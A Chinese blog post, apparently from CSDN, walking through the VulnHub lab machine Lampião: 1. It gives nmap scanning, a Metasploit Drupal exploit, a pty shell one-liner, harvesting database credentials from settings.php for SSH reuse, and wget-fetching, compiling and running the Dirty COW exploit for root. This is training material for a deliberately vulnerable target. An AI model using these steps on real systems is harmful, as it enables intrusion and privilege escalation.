vulnhub靶机——LAMPIÃO: 1

最新推荐文章于 2024-05-27 21:06:21 发布
最新推荐文章于 2024-05-27 21:06:21 发布
阅读量234 收藏 1
点赞数
分类专栏: 靶机 文章标签: 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44029310/article/details/126491252
版权

文章目录

前言

      难度:初等,以前练习的,整理一下。下载地址:https://www.vulnhub.com/entry/lampiao-1,249/。
      靶机地址:192.168.231.143
      kali地址:192.168.231.133

一、Web部分

     1)nmap扫描c段主机存活探测确认靶机ip。

	nmap -sP 192.168.231.0/24

在这里插入图片描述
     2)对靶机ip进行端口收集,开放端口为下图所示。
在这里插入图片描述
     3)做一下目录扫描。
在这里插入图片描述
     4)利用谷歌插件简单指纹识别一下。发现drupal,百度搜索历史漏洞。
在这里插入图片描述
     5)发现在MSF中可以利用。

	search drupal

在这里插入图片描述
     6)使用2018-03-28版本的漏洞。
在这里插入图片描述
     7)查看并配置需要的选项。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
     8)成功获取shell。
在这里插入图片描述
     9)python一句话反弹交互式shell。

python -c”import pty;pty.spawn(‘/bin/bash’)

在这里插入图片描述

二、提权部分

     1)查看当前路径,并且发现当前权限很低需要提权。
在这里插入图片描述
     2)进入sites站点尝试寻找登录账号密码,最后在/sites/default/settings.php发现数据库账号密码,Cat settings.php 发现数据库用户名密码。
在这里插入图片描述
     3)拿数据库的密码去ssh主机,因为很多人都是一个密码通用所以账号,事实也是这样,数据库密码和主机的密码一样,顺利连接上主机。查看内核版本。
在这里插入图片描述
     4)Linux内核版本为2016年7月更新,适合脏牛提权,因为脏牛2016年10月才修复。用searchsploit工具搜索dirty或者searchsploit 4.4.0(4.4.0是uname查出来的版本),然后把40847.cpp文件复制到桌面上。

searchsploit dirty

在这里插入图片描述
     5)然后用python3开启http。

	python3 -m http.server 80

在这里插入图片描述
     6)然后查看所有目录权限找一个有写入权限的目录。
在这里插入图片描述
     7)用靶机下载40847.cpp文件到tmp目录,文件已被命名为1.cpp,可以用wget http://攻击机ip/40847.cpp,或者wget https://www.exploit-db.com/exploits/40847/。
在这里插入图片描述
     8)开始编译。

	g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 1 1.cpp -lutil

在这里插入图片描述
     9)运行成功提权到root权限。

	./1 -s

在这里插入图片描述
     10)成功获取flag。
在这里插入图片描述

Mauro_K
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
lampiao-开源
05-03
Lampiao是一种具有两个模块的软件:代理和服务器。 代理获取硬件/软件/网络信息,并将简历发送到服务器。
靶机渗透测试(Lampião: 1)
@小张小张的博客
10-30 740
靶机渗透测试(): ***Vulnhub靶机 *** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate–Hard) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 得到靶机ip为:192.1
Vulnhub靶场篇:Lampiao 夜车星繁的博客
夜车星繁的博客
03-30 1134
许久没有执笔写博客,而今大脑劳累了两个月后,仿佛再次打破从前自己的思想空间,很久之前曾拥有的某些关于人生规划的想法现在我已经看得到它的模糊影子,这标志着我现在有一个真实存在的远方去跋涉。 昨天注册了hackthebox后一筹莫展,最终选择下载网盘上的靶机资源来试炼。 攻击机:kali 开启Vulnix后首先看到的登录页面: 在kali攻击机里确定...
渗透LAMPIÃO: 1靶场
weixin_51421083的博客
06-30 421
这里有一些描述,可以阅读一下,简单了解一下这个靶场的信息:下载完成后会得到如下图的压缩文件,解压文件。
靶机Lampiao
AzVoidSUN的博客
07-06 722
下载地址 https://www.vulnhub.com/entry/lampiao-1,249/ 选择NAT模式或桥接模式都可以 目标 得到root权限 信息收集 kali的ip是192.168.174.129 扫下c段 发现靶机ip 192.168.174.4 开启了 22 80端口 进入80端口看下 然后查看页面源代码 没有发现东西 dirb扫下目录 发现扫不到东西 ...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
[vulnhub系列]lampiao靶机
薛定谔嘚喵博客
03-08 294
1)信息收集:1、nmap挖掘信息。2、挖掘HTTP服务信息。3、搜寻页面有用的信息。4、对信息页面枚举。5、爬取网页信息。2)暴力破解:hydra暴力破解ssh密码3)提权:1、内核提权。
vulhub靶机--lampiao
m0_58595840的博客
02-02 440
vulnhub渗透,脏牛提权
Vulnhub-Lampiao 靶机渗透
Majula
01-30 1862
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
Lampiao靶机渗透
ZK_1874的博客
03-24 425
Lampiao靶机渗透
Lampião靶机渗透
weixin_56306210的博客
07-24 170
Lampião靶机渗透
Vulnhub靶机Lampiao:1 writeup
xingjinhao123的博客
01-21 4183
下载地址:https://www.vulnhub.com/entry/lampiao-1,249/ 信息搜集 获取IP地址 扫描开放的端口 80端口 80端口没有任何发现 1898端口 发现启动了Drupal 7 列举目录 发现有熟悉的rebots.txt 在CHANGELOG.txt文件里面发现了Drupal 的版本是7.54 getshell 通过Kali中的Searchsploit工具可以确定Drupal 7.5...
靶机Lampiao入侵实战
weixin_51903233的博客
04-01 457
安装Lampiao靶机 地址:Lampiao靶机下载地址 下载完成点击下图被标记的文件,用vmware workstation打开,输入名称与安装路径即可,安装成功将网络适配设置为NET模式 点击启动,成功如下页面: 打开kali,用nmap进行信息采集: 上边ip为你Kali的ip同网段下的其它ip,进行扫描,找出其中你里边一直没有的那个ip,或者尝试开放了下边图中出现的两端口(22,80)的ip: 开放了80与22端口,80端口是http端口,直接访问80端口: 说明方向正确,继续进行: 使用nmap扫
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8261
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Linux - 磁盘的分区和挂载
最新发布
weixin_45735487的博客
05-27 804
逻辑分区只能在拓展分区上划分,编号5-15。拓展分区编号1-4,拓展分区不能格式化。rescue 恢复分区,对于误删的分区进行恢复,语法: rescue 起始 结束。rm 删除分区,后接要删除的分区编号。(L) 在主分区和拓展分区划分完之后,默认提示划分逻辑分区。n 进行磁盘分区,这里会默认MBR标签。(p) msdos下,会默认选择先划分主分区。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值